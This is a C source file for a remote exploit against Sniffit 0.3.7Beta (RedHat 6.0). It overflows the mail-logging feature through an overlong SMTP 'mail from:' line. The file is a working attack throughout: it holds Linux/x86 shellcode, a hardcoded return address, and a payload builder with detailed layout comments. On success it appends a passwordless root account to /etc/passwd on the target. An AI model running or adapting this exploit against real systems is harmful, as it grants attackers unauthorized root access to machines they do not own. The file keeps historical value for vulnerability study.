/*
  Sniffit 0.3.7Beta Remote Exploit
  sniffit has to be running with the -L mail (mail logging) flag set for this to work;
  the payload is sent to TCP port 25 of the target.
  bug discovery by http://www.s0ftpj.org 

  tested on RedHat 6.0
  on success it appends a uid 0, empty-password entry for user "n0ir" to /etc/passwd on the target
  -->snip...
  # tail -1 /etc/passwd
  n0ir::0:0:mr. noir:/:/bin/sh
  <--end...

  greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux 

  exploit code by noir@gsu.linux.org.tr | noir@olympos.org
  http://www.olympos.org

  [RET]{NOP}[shellcode]
  3 May 2000
*/

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

/*
 * Linux/x86 shellcode, 136 bytes, position independent: the jmp/call/pop
 * prologue leaves the address of offset 10 in edi and every data reference
 * is edi-relative. Layout by byte offset within the array:
 *
 *   0-9     jmp +3 / pop edi / jmp +5 / call -8   (edi = address of offset 10)
 *   10-62   open(edi+0x35, 0x401, 0x1a4)  -> int 0x80 with eax=5
 *             0x401 = O_WRONLY|O_APPEND, 0x1a4 = 0644; edi+0x35 is offset 63
 *           write(fd, edi+0x5b, 0x1d)      -> int 0x80 with eax=4
 *             edi+0x5b is offset 101, 0x1d = 29 bytes
 *           exit                           -> int 0x80 with eax=1
 *   63-73   "/etc/passwd"
 *   74      0x01 placeholder: "mov [ebx+0xb], ah" (ah = 0) zeroes it at run
 *           time so the path is NUL-terminated without the payload itself
 *           containing a NUL byte
 *   75-100  NOPs
 *   101-135 "n0ir::0:0:mr. noir:/:/bin/sh" + 7 spaces; the 29-byte write
 *           sends the 28-character entry plus one space and no newline.
 *
 * The array carries no trailing NUL, so its length is sizeof(shellcode);
 * strlen() on it reads past the end.
 */
unsigned char shellcode[]= { 
0xeb,    0x03,    0x5f,    0xeb,    0x05,    0xe8,    0xf8,    0xff, /* jmp/pop edi/jmp/call */
0xff,    0xff,    0x31,    0xdb,    0xb3,    0x35,    0x01,    0xfb, /* ebx = edi + 0x35 */
0x30,    0xe4,    0x88,    0x63,    0x0b,    0x31,    0xc9,    0x66, /* [ebx+0xb] = 0 */
0xb9,    0x01,    0x04,    0x31,    0xd2,    0x66,    0xba,    0xa4, /* cx = 0x401, dx = 0x1a4 */
0x01,    0x31,    0xc0,    0xb0,    0x05,    0xcd,    0x80,    0x89, /* open(), ebx = fd */
0xc3,    0x31,    0xc9,    0xb1,    0x5b,    0x01,    0xf9,    0x31, /* ecx = edi + 0x5b */
0xd2,    0xb2,    0x1d,    0x31,    0xc0,    0xb0,    0x04,    0xcd, /* write(fd, ecx, 29) */
0x80,    0x31,    0xc0,    0xb0,    0x01,    0xcd,    0x80,    0x2f, /* exit(); "/..." */
0x65,    0x74,    0x63,    0x2f,    0x70,    0x61,    0x73,    0x73, /* "etc/pass" */
0x77,    0x64,    0x01,    0x90,    0x90,    0x90,    0x90,    0x90, /* "wd", placeholder, NOPs */
0x90,    0x90,    0x90,
0x90,    0x90,    0x90,    0x90,    0x90,    0x90,    0x90,    0x90,
0x90,    0x90,    0x90,    0x90,    0x90,    0x90,    0x90,   
0x90,    0x90,    0x90,    0x6e,    0x30,    0x69,    0x72,    0x3a, /* "n0ir:" starts at offset 101 */
0x3a,    0x30,    0x3a,    0x30,    0x3a,    0x6d,    0x72,    0x2e, /* ":0:0:mr." */
0x20,    0x6e,    0x6f,    0x69,    0x72,    0x3a,    0x2f,    0x3a, /* " noir:/:" */
0x2f,    0x62,    0x69,    0x6e,    0x2f,    0x73,    0x68,    0x20, /* "/bin/sh " */
0x20,    0x20,    0x20,    0x20,    0x20,    0x20                    /* padding spaces */

};      

int resolv(char *hname, struct in_addr *addr);

/*#define RET 0xaabbccdd  marker lvalue*/
#define RET 0xbfff5ba3    /*RedHat 6.0 (hedwig)*/     

#define NOP 0x90
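enum {
        OVF_LEN = 812,          /* bytes in the overflowing SMTP line */
        ALIGN = 11,             /* 'A' filler before the first return address */
        NOP_OFF = 230,          /* start of the NOP slide */
        SHELLCODE_OFF = 603     /* where the shellcode sits inside the slide */
};

/*
 * Store v as a 4-byte little-endian word (the i386 target's pointer size)
 * at p. Byte-wise so no unaligned or aliasing cast is needed; the caller
 * guarantees p[0..3] lie inside its buffer.
 */
static void
put_le32(unsigned char *p, unsigned long v)
{
        p[0] = (unsigned char)(v & 0xff);
        p[1] = (unsigned char)((v >> 8) & 0xff);
        p[2] = (unsigned char)((v >> 16) & 0xff);
        p[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * write() all of buf[0..len) to fd, retrying on EINTR and short writes.
 * Returns 0 on success, -1 on error (errno set) or when write() reports
 * that nothing could be sent.
 */
static int
send_all(int fd, const void *buf, size_t len)
{
        const unsigned char *p = buf;

        while (len > 0) {
                ssize_t n = write(fd, p, len);
                if (n < 0) {
                        if (errno == EINTR)
                                continue;
                        return -1;
                }
                if (n == 0)
                        return -1;
                p += (size_t)n;
                len -= (size_t)n;
        }
        return 0;
}

/*
 * Entry point: connect to argv[1] on TCP port 25 and send one overlong
 * "mail from:" line. argv[2] is an optional decimal offset added to RET.
 *
 * Payload layout (the header's [RET]{NOP}[shellcode]):
 *   ovf[0..9]      "mail from:"
 *   ovf[10]        one 'A' (ALIGN is 11, one filler byte survives the memcpy)
 *   ovf[11..229]   the candidate return address repeated at stride 4
 *   ovf[230..]     NOP slide
 *   ovf[603..]     shellcode (sizeof(shellcode) bytes), slide continues after it
 *
 * ovf is never NUL-terminated (address bytes and NOPs are not a string),
 * so every length here comes from sizeof(), never strlen().
 * Exit status: 0 after sending, -1 (255) on any error, 0 for usage.
 */
int
main(int argc, char *argv[])
{
        int fd;
        size_t i;
        unsigned long eip = RET, addr = 0;
        long offset = 0;
        unsigned char ovf[OVF_LEN];
        struct sockaddr_in servaddr;

        if (argc < 2){
        fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); 
        fprintf(stderr,"Olympos Security Team  http://www.olympos.org\n");
        fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n");
        fprintf(stderr,"\nUsage: %s  <serv> [offset]\n\n",argv[0]);
        exit(0); 
        }

        /* Parse the optional offset before touching the network; reject
           garbage instead of silently using 0. A negative value wraps addr
           around, which is the intended way to probe below RET. */
        if (argc > 2) {
                char *end;
                errno = 0;
                offset = strtol(argv[2], &end, 10);
                if (end == argv[2] || *end != '\0' || errno == ERANGE) {
                        fprintf(stderr, "bad offset: %s\n", argv[2]);
                        exit(-1);
                }
        }
        addr = eip + (unsigned long)offset;

        if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                perror("socket");
                exit(-1);
        }

        memset(&servaddr, 0, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_port = htons(25);
        if (!resolv(argv[1], &servaddr.sin_addr)) {
                herror("gethostbyname");
                exit(-1);
        }

        if (connect(fd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0) {
                perror("connect");
                exit(-1);
        }

        printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
        printf("Olympos Security Team  http://www.olympos.org\n");
        printf("bug discovery by FuSyS of s0ftpj.org\n");

        /* Build the payload; all bounds are sizeof(ovf). */
        memset(ovf, NOP, sizeof(ovf));
        for (i = 0; i < ALIGN; i++)
                ovf[i] = 0x41;
        /* Repeat the return address across the whole buffer at stride 4 from
           the (unaligned) ALIGN offset, stopping while 4 bytes still fit. The
           NOP fill below then truncates the run at NOP_OFF, leaving a partial
           address in ovf[227..229]. */
        for (i = ALIGN; i + 4 <= sizeof(ovf); i += 4)
                put_le32(&ovf[i], addr);
        for (i = NOP_OFF; i < sizeof(ovf); i++)
                ovf[i] = NOP;
        /* The shellcode array has no terminating NUL: copy sizeof() bytes. */
        if (SHELLCODE_OFF + sizeof(shellcode) > sizeof(ovf)) {
                fprintf(stderr, "shellcode does not fit in the payload buffer\n");
                exit(-1);
        }
        memcpy(&ovf[SHELLCODE_OFF], shellcode, sizeof(shellcode));
        printf("eip: 0x%lx\n", addr);
        /* The SMTP verb overwrites the first 10 'A's; ovf[10] stays 'A'. */
        memcpy(ovf, "mail from:", 10);

        if (send_all(fd, ovf, sizeof(ovf)) < 0 || send_all(fd, "\r\n\n", 3) < 0) {
                perror("write");
                close(fd);
                exit(-1);
        }
        close(fd);
        return 0;
}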

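/*
 * Resolve hname, a dotted-quad literal or a hostname, into *addr.
 * Returns 1 on success and 0 on failure; after a failed lookup h_errno is
 * left as gethostbyname() set it, so the caller may report it via herror().
 * Only an AF_INET record of the right size is accepted: a mismatched
 * address family or length is rejected rather than copied blindly.
 */
int
resolv(char *hname, struct in_addr *addr)
{
        struct hostent *hp;

        if (hname == NULL || addr == NULL)
                return 0;

        /* Numeric address: no lookup needed. */
        if (inet_aton(hname, addr))
                return 1;

        hp = gethostbyname(hname);
        if (hp == NULL)
                return 0;

        /* Validate the record before copying sizeof(*addr) bytes out of it. */
        if (hp->h_addrtype != AF_INET
            || hp->h_length != (int)sizeof(*addr)
            || hp->h_addr_list == NULL
            || hp->h_addr_list[0] == NULL)
                return 0;

        memcpy(addr, hp->h_addr_list[0], sizeof(*addr));
        return 1;
}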
